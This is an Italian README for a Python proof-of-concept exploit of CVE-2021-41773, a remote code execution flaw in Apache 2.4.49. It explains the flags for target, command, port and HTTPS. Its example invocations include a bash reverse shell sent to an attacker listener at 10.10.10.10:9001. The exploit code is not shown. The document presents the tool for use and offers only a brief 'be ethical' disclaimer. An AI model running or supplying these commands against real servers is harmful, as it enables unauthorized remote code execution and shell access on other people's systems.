
Python-based proof-of-concept exploit per CVE-2021-41773, che consente l'esecuzione remota di codice su server Apache 2.4.49 con opzioni personalizzate per comando e porta.
PoC per CVE-2021-41773 dato che ho trovato solo exploit eccessivamente complicati mentre questo va dritto all'Esecuzione Remota di Codice.
Specifica semplicemente l'indirizzo IP del server Apache 2.4.49 vulnerabile con -i e il comando di sistema desiderato con -c. Se il server web non è in ascolto sulla porta 80, puoi specificarla con -p e se il server web utilizza HTTPs devi usare il flag --use-https.
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
Usalo a tua responsabilità (:
Sii etico.